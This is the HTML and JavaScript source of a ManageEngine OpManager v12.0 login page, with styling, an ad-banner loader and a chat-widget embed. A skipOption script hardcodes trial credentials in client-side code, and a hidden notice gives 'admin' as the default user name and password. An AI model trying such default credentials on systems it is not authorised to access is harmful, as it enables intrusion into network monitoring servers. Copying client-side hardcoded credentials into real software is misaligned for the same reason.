// 	//document.loginForm.uname.focus();
// }
 function skipOption()
{            
    document.loginForm.userName.value = "trialuserlogin";//No I18N
    document.loginForm.password.value = "trialuserlogin";//No I18N
	//document.loginForm.domainName.value = "NULL";//no i18n
	//document.loginForm.authType.value = "localUserLogin";//no i18n
    loginSubmit();
}
function setOpacityInputUser()
{
    document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity8");

}
function setOpacity3InputUser()
{
    document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity3");

}
function setOpacityInputEmail()
{
    document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity8");

}
function setOpacity3InputEmail()
{
    document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity3");

}
function setOpacityInputPwd()
{
     document.getElementById('password').setAttribute("class","loginFont pwdField opacity8");
     document.getElementById('password').type = 'password';

}
function setOpacity3InputPwd()
{
     document.getElementById('password').setAttribute("class","loginFont pwdField opacity3");
     document.getElementById('password').type = 'text';

}
function trimAll(str)
{
        /*************************************************************
        Input Parameter :str
        Purpose         : remove all white spaces in front and back of string
        Return          : str without white spaces
        ***************************************************************/

        //check for all spaces
        var objRegExp =/^(\s*)$/;
        if (objRegExp.test(str))
        {
                str = str.replace(objRegExp,'');
                if (str.length == 0)
               { return str;}
        }

        // check for leading and trailling spaces
        objRegExp = /^(\s*)([\W\w]*)(\b\s*$)/;
        if(objRegExp.test(str))
        {
                str = str.replace(objRegExp, '$2');
        }
        return str;
}
</script>

<link href="/apiclient/fluidicv2/styles/css/commonstyles.css" rel="stylesheet" type="text/css" >
<script type='text/javascript' src='/apiclient/fluidicv2/javascript/plugins/select2.min.js'></script>
<link rel='stylesheet' type='text/css' href='/apiclient/fluidicv2/styles/css/plugins/select2.min.css' />







<style>

/* <---------- login page styles starts */
@font-face{font-family:'LatoBold';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Bold.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'LatoLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Light.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'LatoRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Regular.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabThin';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Thin.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Light.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Regular.ttf') format('truetype');font-weight:normal;font-style:normal}

*{box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:none}
html,body{width:100%;height:100%;position:relative;overflow:hidden}
body{background:url(/apiclient/fluidicv2/img/login/login-bg.png) repeat 100%/25%}
#LoginDiv{width:100%;height:100%;padding:0;margin:0;position:absolute;top:0;left:0}
#LoginDiv:before{background:#fff;width:450px;height:450px;content:'';margin:auto;border-radius:50%;box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-ms-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-moz-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-webkit-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-o-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);position:absolute;top:0;right:0;bottom:0;left:0;display:block;z-index:1}
/*#LoginDiv:after{background:url(/apiclient/fluidicv2/img/login/noise-bg.png) no-repeat;width:100%;height:100%;content:'';margin:auto;position:absolute;top:0right:0;bottom:0;left:0;background-size:cover;-moz-background-size:cover;-webkit-background-size:cover;-o-background-size:cover;opacity:0.5}*/
#opmLogin{float:left;width:450px;height:450px;text-align:center;color:#fff;padding:0 30px;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;z-index:2}
#opmLogin h2{width:100%;font:35px RobotoSlabThin;color:#7e909d;position:absolute;top:22px;left:0;z-index:1}
#opmLogin h2 span{background:#65cfe6;font-size:12px;color:#d2faff;padding:2px 5px;margin:0 0 0 5px;border-radius:5px;position:absolute;bottom:5px;display:none}
#opmLogin .info{width:100%;font:45px RobotoSlabThin;position:absolute;top:-100px;left:0;display:none}
#opmLogin .loginField{width:450px;height:450px;margin:auto;position:absolute;top:0;left:0;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease;display:block !important}
#opmLogin .inputField{float:left;width:100%;text-align:center;padding:80px 30px 30px;margin:auto}
#opmLogin .inputFieldRow{width:100%;height:100%;margin:auto}
#opmLogin .inputFieldRow.inputFieldCol-2{width:66.6666666%}
#opmLogin .inputFieldCol{float:left;width:100%;text-align:left;padding:0 50px;margin:50px 0 11px}
#opmLogin .inputFieldCol > div:first-child{width:100%;margin:0 0 10px;border-bottom:1px solid #898989;position:relative}
#opmLogin .inputFieldCol > div:first-child:before,#opmLogin .inputFieldCol > div:first-child:after{background:#898989;width:1px;height:5px;content:'';display:block;position:absolute;bottom:0;left:0}
#opmLogin .inputFieldCol > div:first-child:after{right:0;left:auto}
#opmLogin .inputFieldCol input[type=text],#opmLogin .inputFieldCol input[type=password]{width:100%;font:18px RobotoSlabLight;text-align:center;color:#000;padding:5px 12px;border:0}
#opmLogin .inputFieldCol .selBox > span{background:none;min-width:200px;width:100% !important}
#opmLogin .inputFieldCol .selBox > span .select2-selection__rendered{font:18px LatoLight;color:#ababab}
#opmLogin .inputFieldCol .selBox > span.select2-container--focus .select2-selection__rendered,#opmLogin .inputFieldCol .selBox > span.select2-container--open .select2-selection__rendered{color:#898989}
#opmLogin .inputFieldCol .selBox > span .select2-selection{background:none;border:0}
#LoginDiv .select2-container .select2-dropdown{font:18px LatoLight;border-color:#898989}
#opmLogin .inputFieldCol > span{float:left;font:14px LatoLight;color:#898989;cursor:pointer}
#opmLogin .inputFieldCol > span + span{float:right}
#opmLogin .inputFieldCol > span:hover,#opmLogin .inputFieldCol .opmCheckBox:hover{color:#000}
#opmLogin .inputFieldCol .opmCheckBox{float:left;color:#898989}
#opmLogin .inputFieldCol .opmCheckBox div{float:left;min-width:35px;height:20px;font:12px LatoRegular;padding:0 0 0 27px;cursor:pointer;position:relative}
#opmLogin .inputFieldCol .opmCheckBox input{width:100%;height:100%;margin:0;opacity:0;filter:alpha(opcity=0);position:absolute;top:0;left:0;z-index:2;cursor:pointer}
#opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight;z-index:0}
#opmLogin .inputFieldCol .opmCheckBox + span{float:right}
@keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-ms-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-moz-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-webkit-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
#opmLogin .inputFieldCol .opmCheckBox div label:before{background:#fff;width:15px;height:15px;content:'';border:1px solid #898989;position:absolute;top:0;left:0}
#opmLogin .inputFieldCol .opmCheckBox div label:after{width:4px;height:9px;content:'';border:2px solid transparent;border-bottom:0;border-left:0;position:absolute;top:9px;left:3px;transform:scaleX(-1) rotate(135deg);-ms-transform:scaleX(-1) rotate(135deg);-moz-transform:scaleX(-1) rotate(135deg);-webkit-transform:scaleX(-1) rotate(135deg);transform-origin:left top;-ms-transform-origin:left top;-moz-transform-origin:left top;-webkit-transform-origin:left top;z-index:1}
#opmLogin .inputFieldCol .opmCheckBox input:checked + label:after{border-color:#42be7f;animation:check2 .3s;-ms-animation:check2 .3s;-moz-animation:check2 .3s;-webkit-animation:check2 .3s;-o-animation:check2 .3s}
#opmLogin .logInBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:-6px auto 0;border:0;border-radius:4px;cursor:pointer}
#opmLogin .sendBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:90px auto 0;border:0;border-radius:4px;cursor:pointer}
#opmLogin .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:115px;left:0}
#opmLogin #loginFirst span:first-child{color:#df454e}
#opmLogin #errorDiv{color:#39b54a}
#opmLogin #errorMsg,#opmLogin #forgotPassStatus{color:#ff0000}
.copyRights{width:100%;font:12px RobotoSlabLight;color:#fff;text-align:center;position:fixed;bottom:20px;left:0}
.copyRights span{background:#000;color:#fff;padding:4px 20px 5px 20px;border-radius:4px;display:inline-block}
.opmIconsHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;transform: scale(0.95);z-index:0}
.opmIcons{width:1px;height:1px;position:absolute}
.opmIcons:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block}
.opmIcons > div{width:100px;height:100px;border:2px solid #f5f5f7;border-radius:50%;position:absolute}
.opmIcons > div:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block}
.opmIcons > div:after{background-image:url(/apiclient/fluidicv2/img/opm-login-sprites.png);background-repeat:no-repeat;content:'';margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;display:inline-block;transform:scale(.6)}
.opmIcons.reportsMaps{top:-20px;right:20px}
.opmIcons.reportsMaps:before{height:52px;top:47px;left:-27px;transform:rotate(45deg)}
.opmIcons-reports{top:-110px;left:-80px}
.opmIcons-reports:before{height:69px;top:95px;left:63px;transform:rotate(-10deg)}
.opmIcons-reports:after{background-position:0 0;width:53px;height:49px}
.opmIcons-maps{top:-130px;left:70px}
.opmIcons-maps:before{height:139px;top:64px;left:-33px;transform:rotate(44deg)}
.opmIcons-maps:after{background-position:-54px 0;width:50px;height:67px}
.opmIcons.network{top:10px;right:-80px}
.opmIcons-network:before{height:119px;top:40px;left:-47px;transform:rotate(64deg)}
.opmIcons-network:after{background-position:-104px 0;width:67px;height:67px}
.opmIcons.inventory{top:110px;right:-280px}
.opmIcons-inventory:before{height:284px;top:-86px;left:-142px;transform:rotate(90deg)}
.opmIcons-inventory:after{background-position:-171px 0;width:55px;height:38px}
.opmIcons.workflowServer{top:190px;right:-270px}
.opmIcons.workflowServer:before{height:212px;top:-69px;left:-153px;transform:rotate(90deg)}
.opmIcons-workflow{top:100px;left:-130px}
.opmIcons-workflow:before{height:70px;top:-67px;left:70px;transform:rotate(16deg)}
.opmIcons-workflow:after{background-position:-227px 0;width:71px;height:65px}
.opmIcons-server{top:125px;left:54px}
.opmIcons-server:before{height:157px;top:-116px;left:-46px;transform:rotate(-48deg)}
.opmIcons-server:after{background-position:-299px 0;width:37px;height:47px}
.opmIcons.people{top:430px;right:-41px}
.opmIcons-people:before{height:186px;top:-165px;left:-29px;transform:rotate(-34deg)}
.opmIcons-people:after{background-position:-338px 0;width:99px;height:45px}
.opmIcons.dashboard{top:482px;right:219px}
.opmIcons.dashboard:before{height:20px;top:-77px;left:153px;transform:rotate(-35deg)}
.opmIcons-dashboard{top:10px;right:-120px}
.opmIcons-dashboard:before{height:100px;top:-81px;left:106px;transform:rotate(-143deg)}
.opmIcons-dashboard:after{background-position:0 -69px;width:61px;height:61px}
.opmIconsLeft{transform:translate(0,440px) rotate(-180deg)}
.opmIconsLeft .opmIcons-reports:after{background-position:-62px -69px;width:52px;height:52px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-maps:after{background-position:-115px -69px;width:59px;height:62px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-network:after{background-position:-175px -62px;width:66px;height:68px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-inventory:after{background-position:-242px -66px;width:77px;height:79px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-workflow:after{background-position:-320px -48px;width:58px;height:76px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-server:after{background-position:-379px -45px;width:60px;height:54px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-people:after{background-position:-380px -101px;width:70px;height:58px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons.dashboard{top:482px;right:240px}
.opmIconsLeft .opmIcons-dashboard:after{transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons.reportsMaps:before{height:87px;top:24px;left:-50px;transform:rotate(73deg)}
.opmIconsLeft .opmIcons.reportsMaps{top:-20px;right:-40px}
.opmIconsRight .opmIcons-dashboard{top:-11px;right:-120px}
.opmIconsRight .opmIcons.dashboard:before{height:26px;top:-105px;left:21px;transform:rotate(-76deg)}
.opmIconsRight .opmIcons-dashboard:before{height:87px;top:-84px;left:27px;transform:rotate(-203deg)}
.opmIconsRight .opmIcons.dashboard{top:481px;right:61px}
.opmIconsRight .opmIcons.people{top:490px;right:-121px}
.opmIconsRight .opmIcons-people:before{height:199px;top:-138px;left:-72px;transform:rotate(-52deg)}
.opmIconsRight .opmIcons-workflow{top:120px;left:-180px}
.opmIconsRight .opmIcons-workflow:before{height:104px;top:-42px;left:-47px;transform:rotate(110deg)}
#opmLogin #forgotPasswordDiv .inputField{padding:140px 30px 30px}
#opmLogin #forgotPasswordDiv{left:100%}
.opmLoginFieldHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;overflow:hidden}
#LoginDiv.domainField:before{width:500px;height:500px}
#LoginDiv.domainField .opmIconsHolder,#LoginDiv.domainField #opmLogin{width:500px;height:500px}
#LoginDiv.domainField  .loginField{width:100%;height:100%}
#LoginDiv.domainField #opmLogin h2{top:24px}
#LoginDiv.domainField #authenticationDiv .inputFieldCol{padding:0 30px;margin:20px 0 10px}
#LoginDiv.domainField #authenticationDiv .logInBtn{margin:6px auto 0}
#LoginDiv.domainField #forgotPasswordDiv .inputFieldCol{padding:0 30px}
#LoginDiv.domainField #forgotPasswordDiv .sendBtn{margin:123px auto 0}
#LoginDiv.domainField .opmIcons.dashboard:before{height:20px;top:-51px;left:152px;transform:rotate(-35deg)}
#LoginDiv.domainField .opmIcons-dashboard:before{height:80px;top:-56px;left:108px;transform:rotate(-136deg)}
#LoginDiv.domainField .opmIcons.dashboard{top:518px;right:260px}
#LoginDiv.domainField .opmIconsRight .opmIcons.dashboard{top:481px !important;right:61px !important}
#LoginDiv.domainField .opmIconsRight .opmIcons.dashboard:before{height:64px;top:-51px;left:12px;transform:rotate(-50deg)}
#LoginDiv.domainField .opmIconsRight .opmIcons-dashboard:before{height:0}
#LoginDiv.domainField .opmIconsLeft .opmIcons.dashboard{top:465px}
#LoginDiv.domainField .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:120px;left:0}
#opmLogin h2.ncmLoginTxt{font-size:30px}
#opmLogin h2.nfaLoginTxt{font-size:30px;top:32px}
.opmLoginSkip{font:12px LatoLight;color:#ababab;margin:10px 0 0}
.opmLoginSkip i{font-style:normal}
.opmLoginSkip div{display:inline-block;cursor:pointer}
.opmLoginSkip div:hover{color:#898989}

.loginCredentialInfo{background:#fdf79f;color:#000 !important;padding:3px 8px;margin:0 0 -6px;border-radius:4px;position:relative}

.circle{background:radial-gradient(ellipse at center, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -moz-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background:-webkit-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -o-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -ms-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#000000',GradientType=1 );width:100%;height:100%;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0}

.appDownloadBtn{width:300px;height:25px;text-align:center;margin:auto;position:absolute;right:0;bottom:-67px;left:0}
.appDownloadBtn a{background:url(/apiclient/fluidicv2/img/opm-login-sprites.png) no-repeat 0 0;width:90px;height:25px;margin:0 3px;display:inline-block}
.appDownloadBtn a.icon-iphone{background-position:0 -160px}
.appDownloadBtn a.icon-ipad{background-position:-91px -160px}
.appDownloadBtn a.icon-android{background-position:-182px -160px}
.eventbanner{max-width:1230px;margin:auto;position:fixed;top:0;right:20px;left:20px;z-index:1}
.eventbanner a{float:left;width:100%}
.eventbanner img{width:100%;height:auto}
.eventContent{background:#000;float:left;width:100%;height:auto;font:14px LatoRegular;color:#fff;padding:20px}
.eventContent a{float:none;width:auto;color:#31A5F0;text-decoration:none;display:inline}
.eventContent a:hover{text-decoration:underline}
.opm-closeAd{background:#fa5b5a;width:26px;height:26px;border-radius:50%;display:inline-block;position:absolute;top:3px;right:3px;cursor:pointer;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease}
.opm-closeAd:before,.opm-closeAd:after{background:#fff;width:1px;height:14px;content:'';margin:auto;display:block;position:absolute;top:0;right:0;bottom:0;left:0;transform:rotate(45deg)}
.opm-closeAd:after{transform:rotate(135deg)}

.loginBgCustomized .opmIconsHolder,.loginBgCustomized .appDownloadBtn{display:none}

@media only screen and (max-height:939px){
.opmIconsHolder{transform:scale(.9)}
#LoginDiv,.eventbanner{transform:scale(.95)}
#opmLogin .inputFieldCol > span,.opmLoginSkip{font-size:14px}
#opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight}
body.MacOS #LoginDiv,body.MacOS .eventbanner{transform:scale(.8)}
}
@media only screen and (max-height:700px){
body:not(.loginBgCustomized) #LoginDiv{transform:scale(.8)}
}

.ie-compatibility{background:#fff;text-align:center;position:absolute;top:0;right:0;bottom:0;left:0;overflow:auto}
.ie-compatibility .settingsContent{width:870px;text-align:left;margin:50px auto;display:inline-block}
.ie-compatibility .settingsContent .header,.ie-compatibility .content{float:left;width:100%;height:auto}
.opm-logo{width:213px;height:79px;display:block}
h2{font:23px RobotoSlabLight;color:#f90505;margin:15px 0 15px}
.ie-compatibility .content > div{background:#fff;float:left;width:100%;padding:25px;margin:12px 0;border:1px solid #eaeaea;border-radius:3px;box-shadow:0 1px 4px 0 rgba(0,0,0,.1)}
h4{font:16px LatoBold;color:#4e4e4e;margin:0 0 8px;position:relative}
h4 .info{font:16px LatoRegular;color:#696969}
ul{list-style:disc inside}
li{font:16px/25px LatoRegular;color:#696969}
.part1,.part2{min-height:90px;padding:40px 25px 25px 180px !important;position:relative}
body.ie7 .part1,body.ie7 .part2{width:845px !important}
.part1{padding:40px 25px 25px 80px !important}
.part1 img,.part2 img{display:block;position:absolute;top:30px;left:45px}
.part2 h4{font:35px RobotoSlabThin;color:#1876d7}
.part2 li{line-height:33px}
.part3{padding:40px 25px 40px 55px !important}
.part3 h4{margin:0 0 30px}
.part3 > div{float:left;padding:20px 0 0 50px;margin:0 100px 0 0;position:relative;display:inline-block}
.part3 img{width:33px;height:34px;display:block;position:absolute;top:0;left:0}
.part3 > div.unable2StartEmail img{background-position:-277px -791px;width:42px;height:42px}
.part3 > div > *{display:block}
.part3 > div > b{font:14px LatoBold;color:#545454;position:absolute;top:0;left:50px}
.part3 > div > span{font:16px LatoRegular;color:#4e4e4e}
.part3 > div.unable2StartEmail b{top:2px}
.part3 > div.unable2StartEmail{padding:22px 0 0 50px}
.part3 > div.unable2StartEmail > span{color:#2f45a6}
.ie_issue,.ie_solution{position:absolute !important;top:0 !important;left:-30px !important}

#LoginDiv.showErrorMs #opmLogin h2{margin:30px 0 15px}
#LoginDiv.showErrorMs #opmLogin .inputField {padding:95px 30px 30px}
#LoginDiv.showErrorMs #opmLogin .inputFieldCol{margin:25px 0 0px}
#LoginDiv.showErrorMs #opmLogin .logInBtn{margin:65px auto 0}
#LoginDiv.showErrorMs #opmLogin .loginInfoMsg{width:70%;left:15%}
#LoginDiv.showErrorMs.domainField h2{margin:30px 0 15px}
#LoginDiv.showErrorMs.domainField .inputField {padding:70px 30px 30px}
#LoginDiv.showErrorMs.domainField .inputFieldCol{margin:20px 0 0px}
#LoginDiv.showErrorMs.domainField .logInBtn{margin:36px auto 0}
#LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:100px}
#LoginDiv.showErrorMs.domainField #opmLogin .inputField {padding:70px 30px 30px}
#LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:115px}
#LoginDiv.showErrorMs.domainField #authenticationDiv .logInBtn{margin:40px auto 0}
/* login page styles ends ----------> */
</style>
</head>

<script>

function closeAdBanner()
{    
    if(loginAdID!==undefined){
        $.ajax({        
            url:  "/servlets/SettingsServlet?DISABLE_CURRENT_AD="+loginAdID+"&sid="+Math.random(),//No I18N
            type: "POST",//No I18N        
            dataType: "html",//No I18N        
            success: function(response){
                $('.eventbanner').hide();
            }
        });
    }
}
function redirectAdBanner()
{
    if(hyperLink!=undefined){
	window.open(hyperLink,'_blank');
    }	
}
function loadAdBanner(userCountryName)
{
    var url = "/servlets/SettingsServlet?"; //No I18N
    var dataParams="GetLoginAd="+userCountryName+"&cookieUpdate=true&cookieName=CountryName&cookieValue="+userCountryName+"&cookieExpiry=30"; //No I18N
    $.ajax({
        url: url,
        type: "POST",//No I18N
        dataType: 'json',//No I18N
        async: true,
        data:dataParams,
        success: function(jsonData)
        {
            adPath=jsonData.adPath;
            adText=jsonData.adText;
            hyperLink=jsonData.hyperLink;
            loginAdID=jsonData.loginAdID;
            if(adPath!==undefined){
                 $("#adImageDiv").show();
                 $("#adImagePath").attr("src",adPath); //No I18N
            }else if(adText!==undefined){
                $("#adTextDiv").show();
                $("#adTextDiv .eventContent").text(adText);
            }
        }
    });
            
}
function checkLoginCustomized()
{
	var loginBgValue = "false";
	if(loginBgValue!=="null" && loginBgValue!=="false")
	{
		$('body').addClass('loginBgCustomized');
		if(loginBgValue === "customColor")
		{
			$('body').css({'background':'#'});//No I18N
		}
		else
		{
			$('body').css({'background':"url(/apiclient/fluidicv2/img/login/login-bg.png?"+Math.random()+") no-repeat center/100%"});//No I18N
		}
	}
	var showCopyRight = "on";
	if(showCopyRight==="off"){
		$(".copyRights").css({'display':'none'});//No I18N
	}	
}
</script>
<!--body class="loginBody1" onload="javascript:loadCredentialsFromCookie(); userType();"-->
<body>

<!--Start Login Main Div-->
<form id="form1" name="loginForm" METHOD=post action='j_security_check;jsessionid=E3F79E8675738CB73D8F6F346C24B664' autocomplete="off" onSubmit="return loginSubmit();" >
<input id="authRuleName" type="hidden" name="AUTHRULE_NAME" value="Authenticator"/>
<input type="hidden" name="clienttype" value="html">


<input type="hidden" name="ScreenWidth">
<input type="hidden" name="ScreenHeight">
<input type="hidden" name="loginFromCookieData">
<input type="hidden" id="ntlmv2" name="ntlmv2" value="false">
<input type="hidden" id="domainNameDiv">
<!--Start Login Box-->					
<div class='circle'></div>
        <div class='eventbanner' id='adImageDiv' style='display:none'>
            <a onclick="redirectAdBanner()" target="_blank" style="cursor:pointer;"><img id='adImagePath' src='' alt='banner'></a>
            <i class='opm-closeAd' onclick='closeAdBanner();'></i>
        </div>
        <div class='eventbanner' id='adTextDiv'  style='display:none'>
            <div onclick="redirectAdBanner()" class='eventContent' style="cursor:pointer;"></div>
            <i class='opm-closeAd' onclick='closeAdBanner();'></i>
        </div>
        
        <script>
        var userCountryName="ALL"; //No I18N
        var $zoho=$zoho || {};
        $zoho.salesiq = $zoho.salesiq || {widgetcode:"dfffdb755e785782bec7a76eb4ff95bd57c72617aa8faf11cd82ea2cc4884740",values:{}, //No I18N
           ready:function(embedinfo)
           {
           $zoho.salesiq.floatbutton.visible("hide");  //No I18N 
           $zoho.salesiq.visitor.getGeoDetails();  
           }
           };
        var d=document;
        s=d.createElement("script");
        s.type="text/javascript";
        s.id="zsiqscript";
        s.defer=true;
        s.src="https://salesiq.zoho.com/widget";
        t=d.getElementsByTagName("script")[0];
        t.parentNode.insertBefore(s,t);
        d.write("<div id='zsiqwidget'></div>");   
        $zoho.salesiq.afterReady = function(info) { 
               userCountryName=info.Country;
               loadAdBanner(userCountryName);
        }  
        </script>
        

<div id="LoginDiv">
	<div class='opmIconsHolder'>
		<div class='opmIconsRight'>
			<div class='opmIcons reportsMaps'>
				<div class='opmIcons-reports'></div>
				<div class='opmIcons-maps'></div>
			</div>
			<div class='opmIcons network'>
				<div class='opmIcons-network'></div>
			</div>
			<div class='opmIcons inventory'>
				<div class='opmIcons-inventory'></div>
			</div>
			<div class='opmIcons workflowServer'>
				<div class='opmIcons-workflow'></div>
				<div class='opmIcons-server'></div>
			</div>
			<div class='opmIcons people'>
				<div class='opmIcons-people'></div>
			</div>
			<div class='opmIcons dashboard'>
				<div class='opmIcons-dashboard'></div>
			</div>
		</div>
		<div class='opmIconsLeft'>
			<div class='opmIcons reportsMaps'>
				<div class='opmIcons-reports'></div>
				<div class='opmIcons-maps'></div>
			</div>
			<div class='opmIcons network'>
				<div class='opmIcons-network'></div>
			</div>
			<div class='opmIcons inventory'>
				<div class='opmIcons-inventory'></div>
			</div>
			<div class='opmIcons workflowServer'>
				<div class='opmIcons-workflow'></div>
				<div class='opmIcons-server'></div>
			</div>
			<div class='opmIcons people'>
				<div class='opmIcons-people'></div>
			</div>
			<div class='opmIcons dashboard'>
				<div class='opmIcons-dashboard'></div>
			</div>
		</div>
	</div>
	<div id='opmLogin'>
		
		
		
		
		
			<h2>OpManager<span>v 12.0</span></h2>
		
		
		<div class='info'>The Complete Network Monitoring Software</div>
		<div class='opmLoginFieldHolder'>
			<!--Start authenticationDiv Box-->
			<div class='loginField' id="authenticationDiv" style='display:block;'>
				<div class='inputField'>
					<div class='inputFieldRow opmLoginField'>
					
						
						
							<div class='inputFieldCol'>
						
					
						
							
							
							
								<div><input type='text' name='j_username' placeholder='User Name' id='userName' tabindex='1' /></div>
							
							
							 
							<span>&nbsp;</span>
						</div>
						<div class='inputFieldCol'>
							
							
							
							
								<div><input  id="password" type="password" placeholder='Password' name='j_password'  tabindex='1'/></div>
							
							

							<div class='opmCheckBox'>
								<div>
									<input name="signInAutomatically" id="StayIn" type="checkbox">
									<label>Keep me signed in</label>
								</div>
							</div>
							<span onclick="javascript:showForgotPassword(),forgetPass();" >Forgot Password</span>
						</div>

						
						
						
					</div>
				</div>
				<input id="btnSubmit"  type="submit" class="logInBtn" value="Login">

				 
			</div>
			<!--End authenticationDiv Box-->
			<div class='loginField forgotPasswordField' id="forgotPasswordDiv" style='display:none;'>
				<div class='inputField'>
					<div class='inputFieldRow'>
						<div class='inputFieldCol'>
							<div>
								<input name="uname" id="uname" placeholder='User Name' type="text"  class="loginFont pwdField" tabindex='-1'/>
							</div>
							<span  onclick="javascript:returnLogin();" >Back to Login</span>
						</div>
						
							
							
								<input id="btnSubmit"  type="button" class="sendBtn" value="Send" onclick="javascript:generatePwd();" tabindex='-1'>
							
						
				    </div>
				</div>
			</div>
		</div>
		<div class='loginInfoMsg'>

			
			<div style="display:none;" id="loginFirst">
				<span>Note - &nbsp; </span>	<span>User Name & Password  : admin <span>
			</div>
			

			<div id="forgotPassStatus">
				
			</div>
			<div id="mailErrorDiv" ></div>
			<div id="ie6_statusmsg">
				webclient.common.login.ie webclient.common.login.version
			</div>
			

		</div>
		<div class='appDownloadBtn'>
			
				
				
				
					<a href='https://itunes.apple.com/in/app/opmanager/id561926637?mt=8' target='_blank' class='icon-iphone'></a>
					
					<a href='https://play.google.com/store/apps/details?id=com.manageengine.opm&hl=en' target='_blank' class='icon-android'></a>
				
			
		</div>
</div>
</div>
<div class='copyRights'><span>The Complete Network Monitoring Software from ManageEngine.  Copyright @ 2019 ZOHO Corp., All rights reserved.</span></div>

</form>
<script>
	checkLoginCustomized();
</script>
<div id='browserNotSupportDiv' style='display:none'>
	<div class='ie-compatibility'>
			<div class='settingsContent'>
				<div class='header'>
					<img src='/apiclient/fluidicv2/img/opmlogo.png' class='opm-logo'></img>
					<h2>Problem in loading OpManager GUI with Internet Explorer.</h2>
				</div>
				<div class='content'>
					<div class='part1'>
						<h4 class='browserNotSupportClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your browser version is outdated.</span></h4> 
						<h4 class='compatibilityModeClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your Internet Explorer is running in compatibility mode 9 or below.</span></h4> 
						<h4 class='browserNotSupportClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Solution: <span class='info'>OpManager only supports Internet Explorer version 10 and above. Kindly update your browser.</span></h4>
						<h4 class='compatibilityModeClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Steps to resolve this issue:</h4>
						<ul>
							<li class='compatibilityModeClass'>In Internet Explorer, select '<b>Tools</b>' from the menu or click on the '<b>Tools</b>' icon.</li>
							<li class='compatibilityModeClass'>Select '<b>Compatibility View settings</b>'.</li>
							<li class='compatibilityModeClass'>Uncheck '<b>Display intranet sites in Compatibility View</b>' option.</li>
						</ul>
					</div>
					<div class='part3'>
						<h4>Please contact support for further assistance.</h4>
						<div class='unable2StartPhone'>
							<img src='/apiclient/fluidicv2/img/phone.png'>
							<b>Phone:</b>
							<span>044-67447070 / 71817070</span>
						</div>
